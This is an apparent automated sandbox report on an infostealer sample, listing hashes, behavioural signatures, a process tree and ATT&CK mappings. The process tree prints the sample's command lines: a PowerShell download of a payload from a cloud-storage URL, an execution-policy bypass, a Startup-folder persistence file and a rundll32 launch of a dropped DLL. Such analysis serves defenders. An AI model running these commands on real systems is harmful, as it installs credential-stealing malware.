Analysis
max time kernel: 92s
max time network: 138s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17/11/2024, 02:36
Static task: static1
Behavioral task: behavioral1
  Sample: e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
  Resource: win10v2004-20241007-en
General
Target: e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
Size: 1.1MB
MD5: c96a43db0abf02b0db8ca6efc658dc38
SHA1: a7c1b56d517d66e054e17c6cbd54bb3f1eafab8d
SHA256: e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
SHA512: 6a607ee81d5fa7837643402c9c1d657dea5f0e819b64731f92bf72383d416d6e219520f15e8fb6fd5531fb0b7a1464b80ec30f9699b4304863b276cc2831ff8a
SSDEEP: 24576:BrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaT+DCfkPY:B2EYTb8atv1orq+pEiSDTj1VyvBaTJkQ
Malware Config
Extracted URL: https://my.cloudme.com/v1/ws2/:slight-stood/:web/web.txt
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description | pid | Process | procid_target
PID 1424 created 3548 | 1424 | Guard.exe | 56
PID 1424 created 3548 | 1424 | Guard.exe | 56
PID 1508 created 3548 | 1508 | jsc.exe | 56

Blocklisted process makes network request 3 IoCs
flow | pid | Process
6 | 3900 | powershell.exe
17 | 4784 | powershell.exe
39 | 4612 | rundll32.exe

Command and Scripting Interpreter: PowerShell
pid | Process
3900 | powershell.exe
4784 | powershell.exe
Downloads MZ/PE file

Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url | cmd.exe

Executes dropped EXE 3 IoCs
pid | Process
1424 | Guard.exe
1508 | jsc.exe
400 | jsc.exe

Loads dropped DLL 2 IoCs
pid | Process
4612 | rundll32.exe
4612 | rundll32.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | rundll32.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | rundll32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 1508 set thread context of 400 | 1508 | jsc.exe | 103
Drops file in Program Files directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 2 IoCs
pid | pid_target | Process | procid_target
5092 | 400 | WerFault.exe | 103
1672 | 4612 | WerFault.exe | 107

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Guard.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jsc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jsc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe

Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rundll32.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | rundll32.exe

Modifies system certificate store
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2\Blob = (certificate blob data omitted) | rundll32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2 | rundll32.exe
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid | Process | occurrences
3900 | powershell.exe | 2
4784 | powershell.exe | 2
1424 | Guard.exe | 22
1508 | jsc.exe | 1
4612 | rundll32.exe | 8

Suspicious use of AdjustPrivilegeToken 47 IoCs
description | pid | Process | occurrences
Token: SeDebugPrivilege | 3900 | powershell.exe | 1
Token: SeDebugPrivilege | 4784 | powershell.exe | 1
Token: SeDebugPrivilege | 1508 | jsc.exe | 2
Token: SeIncreaseQuotaPrivilege | 4968 | WMIC.exe | 2
Token: SeSecurityPrivilege | 4968 | WMIC.exe | 2
Token: SeTakeOwnershipPrivilege | 4968 | WMIC.exe | 2
Token: SeLoadDriverPrivilege | 4968 | WMIC.exe | 2
Token: SeSystemProfilePrivilege | 4968 | WMIC.exe | 2
Token: SeSystemtimePrivilege | 4968 | WMIC.exe | 2
Token: SeProfSingleProcessPrivilege | 4968 | WMIC.exe | 2
Token: SeIncBasePriorityPrivilege | 4968 | WMIC.exe | 2
Token: SeCreatePagefilePrivilege | 4968 | WMIC.exe | 2
Token: SeBackupPrivilege | 4968 | WMIC.exe | 2
Token: SeRestorePrivilege | 4968 | WMIC.exe | 2
Token: SeShutdownPrivilege | 4968 | WMIC.exe | 2
Token: SeDebugPrivilege | 4968 | WMIC.exe | 2
Token: SeSystemEnvironmentPrivilege | 4968 | WMIC.exe | 2
Token: SeRemoteShutdownPrivilege | 4968 | WMIC.exe | 2
Token: SeUndockPrivilege | 4968 | WMIC.exe | 2
Token: SeManageVolumePrivilege | 4968 | WMIC.exe | 2
Token: 33 | 4968 | WMIC.exe | 2
Token: 34 | 4968 | WMIC.exe | 2
Token: 35 | 4968 | WMIC.exe | 2
Token: 36 | 4968 | WMIC.exe | 2
Token: SeDebugPrivilege | 4612 | rundll32.exe | 1
Suspicious use of FindShellTrayWindow 10 IoCs
pid | Process | occurrences
4780 | e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe | 7
1424 | Guard.exe | 3

Suspicious use of SendNotifyMessage 10 IoCs
pid | Process | occurrences
4780 | e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe | 7
1424 | Guard.exe | 3

Suspicious use of WriteProcessMemory 38 IoCs
description | pid | Process | procid_target | occurrences
PID 4780 wrote to memory of 3900 | 4780 | e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe | 83 | 2
PID 4780 wrote to memory of 4784 | 4780 | e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe | 88 | 2
PID 4784 wrote to memory of 1424 | 4784 | powershell.exe | 97 | 3
PID 1424 wrote to memory of 4072 | 1424 | Guard.exe | 98 | 3
PID 1424 wrote to memory of 1508 | 1424 | Guard.exe | 102 | 5
PID 1508 wrote to memory of 400 | 1508 | jsc.exe | 103 | 14
PID 400 wrote to memory of 4444 | 400 | jsc.exe | 104 | 3
PID 4444 wrote to memory of 4968 | 4444 | cmd.exe | 106 | 3
PID 400 wrote to memory of 4612 | 400 | jsc.exe | 107 | 3

outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rundll32.exe

outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | rundll32.exe
Processes

C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 3548

  C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"
    PID: 4780
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""
      PID: 3900
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
      PID: 4784
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\Guard.exe
        Command line: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
        PID: 1424
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
    PID: 4072
    - Drops startup file
    - System Location Discovery: System Language Discovery

  C:\Users\Public\jsc.exe
    Command line: C:\Users\Public\jsc.exe
    PID: 1508
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  C:\Users\Public\jsc.exe
    Command line: "C:\Users\Public\jsc.exe"
    PID: 400
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
      PID: 4444
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\Wbem\WMIC.exe
        Command line: wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
        PID: 4968
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start
      PID: 4612
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Accesses Microsoft Outlook accounts
      - Accesses Microsoft Outlook profiles
      - Drops file in Program Files directory
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path

      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2028
        PID: 1672
        - Program crash

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 400
      PID: 5092
      - Program crash

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 400 -ip 400
  PID: 3204

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4612 -ip 4612
  PID: 2372
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  Modify Registry 1
  Subvert Trust Controls 1
    Install Root Certificate 1
Credential Access
  Credentials from Password Stores 1
    Credentials from Web Browsers 1
  Unsecured Credentials 2
    Credentials In Files 1
    Credentials in Registry 1
Downloads